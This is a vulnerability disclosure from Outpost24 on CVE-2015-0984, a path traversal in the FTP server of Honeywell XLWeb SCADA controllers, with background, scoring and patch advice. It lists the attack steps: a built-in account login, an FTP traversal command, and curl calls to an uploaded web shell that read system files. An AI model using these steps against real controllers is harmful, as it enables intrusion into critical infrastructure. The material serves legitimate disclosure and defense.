SCADA - EXPLOITING CVE-2015-0984 FOR SHELL ACCESS

This post is a follow up detailing how to achieve control of the actual
XLWEB SCADA controller. The vulnerability is assigned with reference
CVE-2015-0984.

Rather than the application level administrative access as discussed in
the email regarding CVE-2014-2717, this focuses on issues with the FTP,
default accounts which could not be changed, and high privileges of the
web server user resulting in a simple shell on the server.

In this case we are looking at CVE-2015-0984, or ICSA-15-076-02, but we
expect to be back with a second disclosure soon when the vendor have had
a chance to look at the latest finding, still pending a CVE, if one will
be assigned.

For those interested in a more readable version of this disclosure and
additional information, see
https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/

Please note that the CVE at NVD uses a different CVSS vector than the
one in this disclosure or from ICS-CERT, stating partial confidentiality
and no availability or integrity impact. As this gives shell access to
the system, I am relatively certain the C:C/A:C/I:C is the correct
evaluation.



_________________________

*BACKGROUND*

Honeywell is a US-based company that maintains offices worldwide.

The affected products, XLWeb controllers, are web-based SCADA systems.
According to Honeywell, XLWeb controllers are deployed across several
sectors including Critical Manufacturing, Energy, Water and Waste water
Systems, and others. Honeywell estimates that these products are used
primarily in Europe and the Middle East.

 

_________________________

*VULNERABILITY OVERVIEW*

The vulnerability is defined as a PATH TRAVERSAL. By using a directory
traversal vulnerability in the FTP server, it is possible to gain access
to the web root directory.

A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string
is (AV:N/AC:L/Au:N/C:C/I:C/A:C)

That is;
Access Vector – Network

Access Complexity – Low

Authentication – None <--- Built in account used to target the system

Complete impact to availability, integrity and confidentiality.

Note that NVD uses an incorrect scoring which lists integrity and
availability as unaffected, and confidentiality as partial.



_________________________

*MITIGATION*

The update for this vulnerability is Excel Web Linux version 2.04.01
(March, 2014) or later plus the programming tool CARE version 10.02
(March 2014) or later. Customers are encouraged to contact their local
Honeywell HBS branch to have their sites updated to the latest version.

In the Centraline partner channel, Excel Web controllers also have been
sold under the brand name “FALCON.” Centraline partners can directly
access http://www.centraline.com and get these versions.

Linux:
https://www.centraline.com/index.php?id=847&route=article/index&directory_id=140&direct_link=1

CARE:
https://www.centraline.com/index.php?id=847&route=article/index&directory_id=138&direct_link=1

 

_________________________

*EXTENDED DISCLOSURE*

The system has an account for localization and customization of parts of
the interfaces. The account is available in numerous guides as found
online, account name is XWADMIN.

This account has access to the FTP server, and is also available for
login via TELNET if present. The XWADMIN user is also the user executing
the web-server on the platform.

The platform uses a version of PHP with some vendor modifications, of
importance to an attacker however is that the server support all the
basic functionality one would need from a simple web-shell such as the
exec and passthru functions.

FTP (Windows command line)

FTP honeydemo.internal
Connected to honeydemo.internal.
220- ###################################################
220- #                                                 #
220- # Welcome to the embedded ftp server              #
220- #                                                 #
220- ###################################################
220 xlweb FTP server (GNU inetutils 1.3b) ready.
User (honeydemo.internal:(none)): xwadmin
331 Password required for xwadmin.
Password:
230 User xwadmin logged in.
ftp> cd ../../mnt/mtd6/xlweb/web
250 CWD command successful.



After uploading the shell, we can interact with the server. I like to
keep it simple
curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=whoami”
Response: xwadmin

curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=id”
Response: uid=501(xwadmin) gid=101(xwadmin)

 

And, since we all like a nice wrapper to do our work for us:

python code\HoneyWell\CVE-2015-0984.PY
Starting analysis
Attempting connection via FTP to target vulnerability CVE-2015-0984...
Connected to target, with authenticated access
Using traversal vulnerability to get a shell
Uploading shell...
Shell uploaded, connecting...
Shell open, running commands as xwadmin

EXIT to quit
CMD >>  whoami
xwadmin

CMD >>  cat ../../../../etc/passwd
root:x:0:0:Super-User:/root:/bin/sh
xwadmin:x:501:101:ExcelWeb-Administrator:/home/xwadmin:/bin/sh
modem:x:502:102:Modem-User:/dev/null:/bin/false
uucp:x:503:103:Unix-to-Unix CoPy system:/dev/null:/bin/false
sshd:x:65535:65534:SSH-Deamon:/dev/null:/bin/false
xwtrend:x:504:504:ftp-user:/tmp/xwtrend

CMD >>  EXIT
Running cleanup, deleting shell and closing connections...
Done, connection closed

 

As patch penetration currently is close to 0 among the internet facing
systems, and only very few have patched the critical risk from 2014, we
will not be releasing the script-kiddie friendly tools for neither
CVE-2014-2717 nor CVE-2015-0984, but the information here should be
sufficient to demonstrate the implications of the issue and the need to
apply patches.



_________________________

*FURTHER READING
*Blog:
https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/
NVD: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0984
ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-15-076-02
Outpost24 website: https://www.outpost24.com/

As mentioned in the lead in, other issues were found during
documentation for this advisory, leading to shell access even on fully
patched systems, and the devices should be isolated from public
networks. Just as the vendor recommends.



_________________________

*FINAL WORDS
*Many thanks to Honeywell. During a year of research in the field, only
3 vendors have reacted responsibly and remediated reported issues
associated with SCADA systems. Honeywell have done it the fastest, and
most efficient. This is why they appear in this disclosure – they have
remediated and fixed the critical risk, and we hope other vendors will
assume the same responsibility.

 

-- 
Best Regards,
------------------------------------------------------------------------------------------
Martin Jartelius
CSO
Outpost24 AB
Bastionsgatan 6A | 371 32 Karlskrona | Sweden
E: mj () outpost24 com W: www.outpost24.com <http://www.outpost24.com/>
Outpost24 - Vulnerability Management Made Easy!